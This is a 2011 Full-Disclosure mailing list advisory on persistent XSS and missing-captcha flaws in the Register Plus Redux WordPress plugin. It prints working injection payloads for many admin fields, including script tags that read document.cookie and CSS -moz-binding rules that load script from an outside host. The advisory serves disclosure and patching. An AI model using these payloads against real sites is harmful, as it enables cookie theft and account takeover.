[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] XSS and IAA vulnerabilities in Register Plus Redux for WordPress

To: <submissions@xxxxxxxxxxxxxxxxxxxxxxx>, <full-disclosure@xxxxxxxxxxxxxxxxx>
Subject: [Full-disclosure] XSS and IAA vulnerabilities in Register Plus Redux for WordPress
From: "MustLive" <mustlive@xxxxxxxxxxxxxxxxxx>
Date: Sat, 31 Dec 2011 19:33:21 +0200

Hello list!

I want to warn you about multiple new vulnerabilities in plugin Register 
Plus Redux for WordPress. Last version of the plugin was checked. This is 
second advisory concerning new vulnerabilities in Register Plus Redux.

These are Cross-Site Scripting and Insufficient Anti-automation 
vulnerabilities.

-------------------------
Affected products:
-------------------------

Vulnerable are Register Plus Redux v3.7.3.1 and previous versions.

By request of my client I've made new version of the plugin with fixing of 
all vulnerabilities, which I found. I named this version as Register Plus 
Redux 3.8 (to distinguish between it and original version of the plugin). So 
all users of this plugin can find new and secure version of the plugin in 
Internet.

----------
Details:
----------

Persistent XSS (WASC-08):

There are the next vulnerabilities at page 
http://site/wp-admin/options-general.php?page=register-plus-redux.

In fields: Email Verification, Admin Verification, User Message (if set 
Custom New User Message), User Message (if set Custom Verification Message), 
Admin Message (if set Custom Admin Notification), Custom Register CSS, 
Custom Login CSS:
</textarea><script>alert(document.cookie)</script>

The code will work at page 
http://site/wp-admin/options-general.php?page=register-plus-redux, and in 
case of fields Email Verification and Admin Verification also will work at 
page http://site/wp-login.php?checkemail=registered.

If to set the code in fields Custom Register CSS, Custom Login CSS:
body {-moz-binding:url(http://websecurity.com.ua/webtools/xss.xml#xss)}

The code will work accordingly at pages 
http://site/wp-login.php?action=register and http://site/wp-login.php. The 
code will work in Firefox < 3.0, but if to place xml-file at the same site 
(via uploader), then it'll be possible to attack also Firefox 3.0 and 
higher. And if to set the code with using of expression, javascript or 
vbscript in styles, then it'll execute in IE.

If to set the code in field Minimum password length (in User Set Password) 
at set options Require new users enter a password during registration and 
Show password strength meter:
1){}};alert(document.cookie);function a(){if(1==1

The code will work at page http://site/wp-login.php?action=register.

If to set the code in fields Empty, Short, Bad, Good, Strong, Mismatch (in 
User Set Password) at set options Require new users enter a password during 
registration and Show password strength meter:
"};alert(document.cookie);/*

The code will work at page http://site/wp-login.php?action=register.

If to set the code in field Required Fields Style Rules:
-moz-binding:url(http://websecurity.com.ua/webtools/xss.xml#xss)

The code will work at page http://site/wp-login.php?action=register. The 
code will work in Firefox < 3.0, but if to place xml-file at the same site 
(via uploader), then it'll be possible to attack also Firefox 3.0 and 
higher. And if to set the code with using of expression, javascript or 
vbscript in styles, then it'll execute in IE.

Strictly Social XSS persistent (WASC-08):

In above-mentioned fields User Message (if set Custom New User Message), 
User Message (if set Custom Verification Message), Admin Message (if set 
Custom Admin Notification) besides XSS in field itself, there is also XSS 
via visualization (which is going via jQuery), and so at sending of POST 
request the code will execute twice, and it's needed to fix every of these 
vulnerabilities in two places (because even escaped code will execute). 
Besides an attack via sending POST request, it's possible to conduct XSS 
attack via visualization in these three fields, and also in nine other 
fields (From Email, From Name, Subject in Custom New User Message, in Custom 
Verification Message and in Custom Admin Notification) at pasting of XSS 
code in the field.

I.e. it's needed fraudulently to force a victim to paste code in any of 
these 12 fields, at that the code can be put in clipboard of a victim via 
attack via clipboard 
(http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2011-October/008056.html).
 
These vulnerabilities - it's Strictly social XSS 
(http://websecurity.com.ua/5476/).

Insufficient Anti-automation (WASC-21):

http://site/wp-login.php?action=register

In registration form there is no protection against automated requests 
(captcha). As in previous versions of the plugin.

------------
Timeline:
------------

2011.11.25 - found vulnerabilities.
2011.11.30 - fixed vulnerabilities.
2011.11.30 - Informed developer.
2011.11.30 - released Register Plus Redux 3.8 (with fixed all 
vulnerabilities of version 3.7.3.1).
2011.12.01 - announced at my site.
2011.12.05 - released Register Plus Redux 3.8.1 (with new features).
2011.12.31 - disclosed at my site.

I mentioned about these vulnerabilities at my site:
http://websecurity.com.ua/5536/

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua 


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Prev by Date: [Full-disclosure] [SECURITY] [DSA 2376-2] ipmitool security update
Next by Date: Re: [Full-disclosure] [FG-VD-11-007]IBM Lotus Notes/Domino Server Remote Denial of Service Vulnerability
Previous by thread: [Full-disclosure] [SECURITY] [DSA 2376-2] ipmitool security update
Next by thread: Re: [Full-disclosure] INSECT Pro - Version 3.0 Released!
Index(es):
- Date
- Thread